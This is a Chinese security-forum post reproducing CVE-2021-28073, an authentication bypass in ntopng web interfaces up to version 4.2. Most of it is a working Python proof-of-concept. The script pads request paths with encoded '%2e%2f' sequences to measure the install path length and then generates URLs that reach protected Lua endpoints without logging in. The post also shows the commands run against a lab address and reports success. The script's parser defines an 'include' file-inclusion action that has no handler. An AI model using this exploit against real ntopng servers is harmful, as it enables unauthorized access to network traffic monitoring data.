安全矩阵

 找回密码
 立即注册
搜索
查看: 1477|回复: 0

ntopng 权限绕过 (CVE-2021-28073)

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-10-19 19:29:40 | 显示全部楼层 |阅读模式

描述: ntopng是监控服务器网络流量的工具,对外提供Web页面。其4.2及以前的版本中存在一处权限绕过漏洞,利用该漏洞可以未授权访问目标任意接口。

影响范围
ntopng commit < e8b9721479f401f595c5c7bb151819aceb03ad71
漏洞利用:
打开网页

这个漏洞主要是未授权访问接口或者说目录
所以我们先用admin/admin登录进去随便选一个接口网址

然后退出登录状态
用POC计算出ntopng lua目录的长度
python 1.py

poc 如下
import sys
import requests
import argparse
import logging


def is_ntopng() -> bool:
    response = session.get(base_url, allow_redirects=False)
    return response.status_code == 302 and '/lua/login.lua' in response.headers.get('Location', '')


def get_base_length() -> int:
    for i in range(90, 120):
        url = base_url + '/lua/' + '%2e%2f' * i + 'as_stats.lua.css'
        response = session.get(url, allow_redirects=False)
        if response.status_code < 300:
            return 255 - 1 - i * 2 - len('as_stats.lua')

    for i in range(90, 120):
        url = base_url + '/lua/' + '%2e%2f' * i + 'get_macs_data.lua.css'
        response = session.get(url, allow_redirects=False)
        if response.status_code < 300:
            return 255 - 1 - i * 2 - len('get_macs_data.lua')
   
    return -1



def get_padding_length(path: str):
    padding_length = 255 - 1 - base_length - len(path)
    if padding_length % 2 == 1:
        raise RuntimeError(f'path {path} is not support')

    return int(padding_length / 2)



logging.basicConfig(stream=sys.stderr, level=logging.WARNING)
session = requests.Session()
session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2021-28073 POC for ntopng.')
    parser.add_argument('-u', '--url', help='base url for ntopng, eg: http://192.168.1.233:3000', metavar='<URL>', required=True)
    parser.add_argument('-v', '--verbose', default=False, action='store_true')
   

    subparsers = parser.add_subparsers(dest='action')
   
    baselength_command = subparsers.add_parser('baselength', help='get base path length of ntopng')
   
    generate_command = subparsers.add_parser('generate', help='generate the authenticate bypass url')
    generate_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)
    generate_command.add_argument('-p', '--path', help='lua pathname', metavar='<PATH>', required=True)
   
    generate_command = subparsers.add_parser('include', help='generate the arbitrary file inclusion url')
    generate_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)
    generate_command.add_argument('-i', '--include', help='path to include', metavar='<PATH>', required=True)
   
    args = parser.parse_args()
    if not args.action:
        parser.print_help()
        sys.exit(1)
   
    if args.verbose:
        logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
   
    base_url = args.url.rstrip('/')
   
    # check target
    if not is_ntopng():
        raise RuntimeError('No Ntopng detected')
   
    if args.action == 'baselength':
        base_length = get_base_length()
        sys.stdout.write(f'ntopng install path length: {base_length}\n')
    elif args.action == 'generate':
        base_length = args.length
        path = args.path
        sys.stdout.write(base_url + '/lua/' + '%2e%2f' * get_padding_length(path) + path + '.css\n')


长度36
未授权访问
python 1.py --url http://192.168.1.192:34352/  generate -l 36 -p hosts_stats.lua
不支持

换到另一个接口网址
python 1.py --url ht
tp://192.168.1.192:34352/  generate -l 36 -p if_stats.lua

用浏览器访问

直接访问
越权成功
但是切换界面发现还是要登录用户

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:40 , Processed in 0.013397 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表